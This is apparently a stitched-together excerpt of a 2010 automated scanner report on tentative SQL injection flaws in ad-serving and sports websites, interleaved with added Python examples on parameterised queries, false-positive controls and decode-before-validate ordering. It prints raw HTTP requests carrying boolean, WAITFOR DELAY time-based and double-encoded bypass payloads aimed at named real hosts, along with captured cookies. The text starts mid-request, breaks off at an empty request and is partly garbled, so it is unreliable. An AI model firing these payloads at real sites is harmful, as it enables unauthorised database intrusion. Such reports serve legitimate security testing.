&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22i
mage%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:25:22 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=brjll816ftk3i&t=1291767922;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19323
Request 2
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d2--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22i
mage%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:25:22 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=0lbrjth6ftk3i&t=1291767922;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19333
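To make the finding above concrete, here is an added example (not code from the report or from the scanned application) in Python with sqlite3. It shows what the two sltId2 payloads do to a query that splices the parameter into the SQL text, and that the same payloads are inert against a parameterised query. The table and column names are constructed for illustration; the real schema behind the endpoint is unknown.

```python
import sqlite3

# Payloads from the report, URL-decoded: sltId2=2'%20and%201%3d1--%20 and
# sltId2=2'%20and%201%3d2--%20 (the trailing space keeps "--" a comment).
TRUE_PAYLOAD = "2' and 1=1-- "
FALSE_PAYLOAD = "2' and 1=2-- "


def make_db():
    """Constructed sample table of ad slots; the real schema is unknown."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE slots (slot_id TEXT, size TEXT, position TEXT)")
    con.executemany(
        "INSERT INTO slots VALUES (?, ?, ?)",
        [("0", "130x70", "ipbtf_tlsb"), ("1", "130x70", "ipbtf_mlsb"),
         ("2", "130x70", "ipbtf_blsb"), ("3", "728x90", "ipbtf")],
    )
    return con


def concat_sql(slot_id):
    """The vulnerable pattern: request data spliced into the SQL text."""
    return "SELECT size, position FROM slots WHERE slot_id = '" + slot_id + "'"


def lookup_concat(con, slot_id):
    # With TRUE_PAYLOAD the statement becomes
    #   ... WHERE slot_id = '2' and 1=1-- '
    # the quote closes the literal, "and 1=1" is evaluated, "-- '" is a comment.
    return con.execute(concat_sql(slot_id)).fetchall()


def lookup_param(con, slot_id):
    """The fix: structure first, value bound second; the payload is just data."""
    return con.execute(
        "SELECT size, position FROM slots WHERE slot_id = ?", (slot_id,)
    ).fetchall()


def differs(lookup):
    """True when the 1=1 and 1=2 payloads produce different result sets,
    i.e. the injected condition is being evaluated by the database."""
    con = make_db()
    return lookup(con, TRUE_PAYLOAD) != lookup(con, FALSE_PAYLOAD)


if __name__ == "__main__":
    con = make_db()
    print(concat_sql(TRUE_PAYLOAD))
    print("concat 1=1:", lookup_concat(con, TRUE_PAYLOAD))
    print("concat 1=2:", lookup_concat(con, FALSE_PAYLOAD))
    print("param  1=1:", lookup_param(con, TRUE_PAYLOAD))
    print("param  1=2:", lookup_param(con, FALSE_PAYLOAD))
```

With string concatenation the 1=1 payload returns slot 2 and the 1=2 payload returns nothing, which is exactly the difference the scanner looks for; with the bound parameter both payloads are compared literally against slot_id and return the same (empty) result.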
1.120. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sanfrancisco.giants.mlb.com
Path:
/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 86828936%20or%201%3d1--%20 and 86828936%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.jsp?c_id=sf&186828936%20or%201%3d1--%20=1 HTTP/1.1 Host: sanfrancisco.giants.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=599 Expires: Wed, 08 Dec 2010 01:22:45 GMT Date: Wed, 08 Dec 2010 01:12:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139605
Request 2
GET /index.jsp?c_id=sf&186828936%20or%201%3d2--%20=1 HTTP/1.1 Host: sanfrancisco.giants.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=599 Expires: Wed, 08 Dec 2010 01:22:46 GMT Date: Wed, 08 Dec 2010 01:12:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139595
The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 11807099'%20or%201%3d1--%20 and 11807099'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
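The note repeated after each finding above matters most for endpoints like the ad server in the first finding, whose Response 1 and Response 2 differ in Date, Set-Cookie and Content-Length (19302 vs 19313 bytes) on any two requests, payload or not. The following added Python example (not part of the report) shows a difference-based check with the control a manual review would apply: strip headers that change on every request, send the same payload twice, and only trust a 1=1 / 1=2 difference when the two baselines agree. The servers are constructed stand-ins; no request is sent.

```python
import itertools
import sqlite3

# Payloads as used throughout the report, URL-decoded.
TRUE_PAYLOAD = "' and 1=1-- "
FALSE_PAYLOAD = "' and 1=2-- "

# Headers that legitimately change on every request and must not count as a
# "difference": the yieldmanager responses differ in Date, Set-Cookie and
# Content-Length even though the two requests were sent a second apart.
VOLATILE_HEADERS = frozenset({"date", "set-cookie", "expires", "content-length"})


def normalise(resp):
    """Reduce a (status, headers, body) triple to the parts expected to be stable."""
    status, headers, body = resp
    stable = tuple(sorted(
        (k.lower(), v) for k, v in headers.items() if k.lower() not in VOLATILE_HEADERS
    ))
    return (status, stable, body)


def boolean_oracle(send, true_payload=TRUE_PAYLOAD, false_payload=FALSE_PAYLOAD):
    """Difference-based check with a stability control.

    send(payload) -> (status, headers, body). The true payload is sent twice
    first; if those two baselines already differ, the endpoint is noisy and a
    1=1 / 1=2 difference proves nothing, so the result is 'inconclusive'.
    """
    base_a = normalise(send(true_payload))
    base_b = normalise(send(true_payload))
    if base_a != base_b:
        return "inconclusive"
    alt = normalise(send(false_payload))
    return "vulnerable" if alt != base_a else "not_vulnerable"


def make_ad_server(rotate):
    """Constructed stand-in for an ad-serving endpoint. It ignores the payload
    entirely; with rotate=True it returns a different creative on each call,
    as real ad rotation does."""
    counter = itertools.count()

    def send(payload):
        n = next(counter)
        creative = "creative-%d" % (n % 3 if rotate else 0)
        headers = {"Date": "t%d" % n, "Set-Cookie": "S=s=%d" % n,
                   "Content-Type": "application/x-multiad-json"}
        return (200, headers, '{"ads":[{"ad":"%s"}]}' % creative)

    return send


def make_vulnerable_server():
    """Constructed stand-in that really evaluates the injected condition, by
    splicing the payload into a SQL literal the way the vulnerable code does."""
    con = sqlite3.connect(":memory:")

    def send(payload):
        # becomes: SELECT 'ad' WHERE '1' and 1=1-- '
        rows = con.execute("SELECT 'ad' WHERE '1" + payload + "'").fetchall()
        return (200, {"Content-Type": "text/html"}, "<ad/>" if rows else "")

    return send


if __name__ == "__main__":
    print("rotating ad server :", boolean_oracle(make_ad_server(rotate=True)))
    print("static ad server   :", boolean_oracle(make_ad_server(rotate=False)))
    print("vulnerable back end:", boolean_oracle(make_vulnerable_server()))
```

Against the rotating ad server the two baselines disagree and the verdict is inconclusive, which is the honest answer for the yieldmanager and rubiconproject findings above; only the stand-in that actually evaluates the injected condition comes back as vulnerable.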
1.124. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://tap.rubiconproject.com
Path:
/oz/sensor
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The put_1986 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1986 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d1--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;
Response 1
HTTP/1.1 204 No Content Date: Wed, 08 Dec 2010 01:28:01 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/ Set-Cookie: dq=17|1|16|0; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/ Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/ Set-Cookie: lm="8 Dec 2010 01:28:02 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
Request 2
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d2--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;
The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads 19221418'%20or%201%3d1--%20 and 19221418'%20or%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 35022 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server; this is inferred from the T-SQL WAITFOR DELAY syntax of the payload, not from any database error message. Note that the observed delay (about 35 seconds) does not match the 20 seconds requested and the body returned is a generic error page, so a timeout or upstream failure is an alternative explanation. Repeat the request with different delay values (for example 0:0:5 and 0:0:10) and confirm that the response time tracks the requested delay before treating this as confirmed.
Request
GET /js'waitfor%20delay'0%3a0%3a20'--/bk-static.js HTTP/1.1 Host: www.bkrtx.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #97.a675aad1.1291772182.225ed38 </BODY></HTML>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload %2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d was submitted in the REST URL parameter 2. The application took 34085 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server, inferred from the T-SQL WAITFOR DELAY syntax of the payload. As with parameter 1, the 34-second response and the generic error page do not match the 20-second delay requested, so confirm with varying delay values before treating the finding as verified.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need for the application to URL-decode the value of REST URL parameter 2 a second time, since the web server will already have decoded it once; that second decode is what turns %2527 into a quote after any filter has run. In any case, the application should perform its input validation only after all decoding and other custom canonicalisation has been completed.
Request
GET /js/bk-static.js%2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d HTTP/1.1 Host: www.bkrtx.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY> An error occurred while processing your request.<p> Reference #97.a675aad1.1291772456.226aa26 </BODY></HTML>
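The double-encoding bypass and the remediation advice for this finding, as an added Python example (not code from the report or the scanned site). It uses the two payloads from the REST URL findings above; the blocked-character list is an assumption, since the report only says the quote is among the blocked characters. It contrasts the ordering the finding implies (filter, then a second decode) with decoding fully before validating, and with not decoding a second time at all.

```python
from urllib.parse import unquote

# The two attempts from the report, as they appear on the wire (the path
# segment after /js/). The first is single-encoded, the second double-encoded.
SINGLE_ENCODED = "bk-static.js%27waitfor%20delay%270%3a0%3a20%27--"
DOUBLE_ENCODED = "bk-static.js%2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d"

# What the application's filter looks for. Assumption: the report only says
# that the quote character is among the characters it blocks.
BLOCKED = ("'", "--")


def is_blocked(value):
    return any(tok in value for tok in BLOCKED)


def server_decode(segment):
    """The web server percent-decodes the URL exactly once."""
    return unquote(segment)


def filter_then_decode(segment):
    """Broken ordering implied by the finding: validate the once-decoded value,
    then run a second, custom decode. %2527 reaches the filter as %27, passes,
    and only becomes a quote afterwards. Returns the value handed to the
    query, or None if the filter rejected it."""
    if is_blocked(segment):
        return None
    return unquote(segment)


def decode_then_filter(segment):
    """Correct ordering: finish all canonicalisation, then validate the result."""
    canonical = unquote(segment)
    if is_blocked(canonical):
        return None
    return canonical


def no_second_decode(segment):
    """Simplest fix: trust the server's single decode and never decode again,
    so a surviving %27 stays three harmless characters."""
    return None if is_blocked(segment) else segment


if __name__ == "__main__":
    for raw in (SINGLE_ENCODED, DOUBLE_ENCODED):
        once = server_decode(raw)
        print("after server decode :", once)
        print("  filter_then_decode:", filter_then_decode(once))
        print("  decode_then_filter:", decode_then_filter(once))
        print("  no_second_decode  :", no_second_decode(once))
```

The single-encoded attempt is rejected under every ordering, which is why the scanner fell back to double encoding; only filter_then_decode lets the double-encoded value through as a live WAITFOR DELAY string.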
The t_mtype parameter appears to be vulnerable to SQL injection attacks. The payloads 49362984'%20or%201%3d1--%20 and 49362984'%20or%201%3d2--%20 were each submitted in the t_mtype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d1--%20 HTTP/1.1 Host: www.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:37:30 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: Apache=174.121.222.18.1291768650859840; path=/; expires=Tue, 03-Dec-30 00:37:30 GMT X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Set-Cookie: PHPSESSID=04qimd7i4eptlr5qrb61n69d61; path=/; domain=www.carpricesecrets.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com Set-Cookie: landing_id=70445704; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27519
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Don't Miss Out on Year End Vehicle Sales!</title> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Script-Type" content="application/javascript" /> <meta name="description" content="New Vehicle Prices are at an All-Time Low!" /> <meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" /> <link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />
if (typeof(Local) === 'undefined') { var Local = {}; }
</script>
<!-- OPTIMOST PAGE CODE V2.7 - Copyright 2002-2008 Interwoven, Inc. --> <script language="javascript" type="text/javascript"><!-- var optimost={A:{},C:{},D:document,L:document.location,M:[ ],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA: {"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cookie;if(s.length>3){for(var a=s.substring(1) .split("&"),i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)this.Q[a[i].substring(0,p)]=unescape(a[i].substring( p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");while(v[0].substring(0, 1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)this.C[v[0]]=unescape(v[1]);}}},B:function(){var n;this.A={ };var _o=this;this.A.D_ts=Math.round(_o.T.getTime()/1000);this.A.D_tzo=_o.T.getTimezoneOffset();this.A.D_loc=_o.L.protocol+ "//"+_o.L.hostname+_o.L.pathname;this.A.D_ckl=_o.D.cookie.length;this.A.D_ref=_o.D.referrer;if(typeof optrial=="object") for(n in optrial)this.A[n]=optrial[n];for(n in this.Q)this.A[n]=this.Q[n];for(n in this.C)if(n.substring(0,2)=="op")this.A[n]= this.C[n];},S:functi ...[SNIP]...
Request 2
